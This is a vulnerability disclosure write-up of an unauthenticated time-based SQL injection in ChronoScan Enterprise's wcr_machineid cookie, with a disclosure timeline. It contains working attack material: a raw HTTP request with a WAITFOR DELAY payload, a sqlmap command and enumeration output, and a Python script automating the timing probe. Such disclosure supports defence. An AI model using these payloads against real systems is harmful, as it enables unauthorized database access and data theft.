ChronoScan Enterprise Unauthenticated SQL Injection


ChronoScan is OCR software created by ChronoScan Capture S.L. that reads and parses data from the documents it receives. Given a document or PDF, it extracts the fields you have configured from the input file. This is especially useful where an automated process produces a high volume of documents whose contents need to be loaded quickly into a database or some other type of storage. Community and Enterprise editions are available.


I've identified an unauthenticated time-based SQL injection in the latest ChronoScan Enterprise version (v1.5.4.3 as of 8-24-2018). The vulnerability has not yet been confirmed on other versions, but given the nature of the attack (unauthenticated, no specific parameters required, etc.) I believe it is present in all versions up to this point. I will update this post once the vendor confirms which versions are affected.

The vulnerability lies in how the wcr_machineid cookie is used to identify users and the sessions associated with them. It appears the cookie value is inserted unsanitized into a SQL statement that checks the current “machine's” access level. An unauthenticated attacker, even one without a valid wcr_machineid cookie, can exploit this as a time-based SQL injection. Below is the request originally used to identify the issue.

GET / HTTP/1.1
Host: vulnerable:10000
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Referer: http://vulnerable:10000/?wtd=VQWist5qQW3IS6uy
Cookie: wcr_machineid=')waitfor%20delay'0%3a0%3a20'--; wcr_uspw=deleted; wcr_repw=1

Compare this request (which asks the database server for a 20 second pause via T-SQL WAITFOR DELAY) with one that omits the SQL payload: the injected request takes roughly 20 seconds longer to return. I then ran the following sqlmap command, which confirmed the vulnerability; the asterisk marks the injection point inside the cookie.

sqlmap -u "http://vulnerable:10000" --cookie="wcr_machineid=*;wcr_uspw=deleted;wcr_repw=1"
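Reproducing the timing check described above as a small script (an added example, not ChronoScan code or the author's tooling): it sends the WAITFOR DELAY payload in the wcr_machineid cookie, compares the response time against a baseline request, and only reports an injection when the delay is reproducible across repeated requests and tracks two different requested durations. The host and port (vulnerable:10000) are taken from the sample request; the `probe` machine id in the baseline cookie is a constructed value.

```python
"""Time-based SQL injection probe for the wcr_machineid cookie.

Added example, not ChronoScan code. It reproduces the manual check from the
write-up (a request carrying a T-SQL WAITFOR DELAY payload versus a baseline
request) and only reports success when the delay is reproducible and scales
with the requested duration. TARGET_HOST/TARGET_PORT are assumptions taken
from the advisory's sample request.
"""
import http.client
import time
import urllib.parse
from typing import Sequence

TARGET_HOST = "vulnerable"  # assumption: host from the advisory's request
TARGET_PORT = 10000         # assumption: port from the advisory's request
OTHER_COOKIES = "wcr_uspw=deleted; wcr_repw=1"  # cookies sent alongside in the advisory


def build_cookie(delay_seconds: int) -> str:
    """Return the Cookie header value used in the write-up.

    The wcr_machineid value closes the open string literal with '), stacks
    WAITFOR DELAY 'h:m:s', and comments out the remainder with --. Only the
    cookie value is percent-encoded, as in the captured request.
    """
    payload = f"')waitfor delay'0:0:{delay_seconds}'--"
    encoded = urllib.parse.quote(payload, safe="'()-")
    return f"wcr_machineid={encoded}; {OTHER_COOKIES}"


def baseline_cookie() -> str:
    """Same cookies with a harmless (constructed) machine id and no SQL payload."""
    return f"wcr_machineid=probe; {OTHER_COOKIES}"


def timed_get(cookie: str, timeout: float) -> float:
    """Send GET / with the given Cookie header and return the elapsed seconds."""
    conn = http.client.HTTPConnection(TARGET_HOST, TARGET_PORT, timeout=timeout)
    start = time.monotonic()
    try:
        conn.request("GET", "/", headers={"Cookie": cookie, "Connection": "close"})
        conn.getresponse().read()
    finally:
        conn.close()
    return time.monotonic() - start


def looks_injectable(baseline: Sequence[float], delayed: Sequence[float],
                     delay_seconds: int, tolerance: float = 0.5) -> bool:
    """Decide whether the delayed samples show the injected sleep.

    Every payload response must take at least the injected delay longer than
    the *slowest* baseline response (minus a small tolerance for jitter).
    Using the slowest baseline and requiring every sample to clear the bar
    keeps a momentarily slow server from producing a false positive.
    """
    if not baseline or not delayed:
        return False
    threshold = max(baseline) + delay_seconds - tolerance
    return all(t >= threshold for t in delayed)


def probe(delays: Sequence[int] = (5, 20), rounds: int = 2) -> bool:
    """Run the check for several delay values; all of them must succeed.

    Two different delays guard against a fixed slow code path being mistaken
    for injection: the response time has to track the value we asked for.
    """
    baseline = [timed_get(baseline_cookie(), timeout=60) for _ in range(rounds)]
    for delay in delays:
        delayed = [timed_get(build_cookie(delay), timeout=delay * 3 + 30)
                   for _ in range(rounds)]
        if not looks_injectable(baseline, delayed, delay):
            return False
    return True


if __name__ == "__main__":
    print("time-based injection reproduced" if probe() else "no reproducible delay")
```

Run it only against an instance you are authorized to test. The decision logic is deliberately conservative: a single slow response proves nothing, so the script needs every payload request to clear the baseline by the requested delay and needs that to hold for two different delays, which is essentially what sqlmap's confirmation step does with more samples.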

After confirmation, enumerating the available databases returned the following (the SQL Server system databases).

[*] master
[*] model
[*] msdb
[*] tempdb

Enumerating the tables in the CHRONOSCAN database (60 in total) returned the following; the list below is truncated.

[12:01:33] [INFO] fetching tables for database: CHRONOSCAN
[12:01:33] [INFO] fetching number of tables for database 'CHRONOSCAN'
[12:01:33] [INFO] resumed: 60
[12:01:33] [INFO] resumed: dbo.chrono_Buyers
[12:01:33] [INFO] resumed: dbo.chrono_Suppliers
[12:01:33] [INFO] resumed: dbo.chronosys_csi_export_history
[12:01:33] [INFO] resumed: dbo.chronosys_csi_user_params
[12:01:33] [INFO] resumed: dbo.chronosys_doctype_options
[12:01:33] [INFO] resumed: dbo.chronosys_entities
[12:01:33] [INFO] resumed: dbo.chronosys_entities_params
[12:01:33] [INFO] resumed: dbo.chronosys_entity_masterkey_line_account
[12:01:33] [INFO] resumed: dbo.chronosys_event_track
[12:01:33] [INFO] resumed: dbo.chronosys_job_types_cache


- August 24, 2018: Vulnerability identified
- August 24, 2018: Vendor notified and acknowledged
- August 24, 2018: CVE ID requested
- August 24, 2018: CVE-2018-15868 reserved
- August 27, 2018: Details provided to MITRE
- August 28, 2018: Vendor issues patch for verification (not yet public)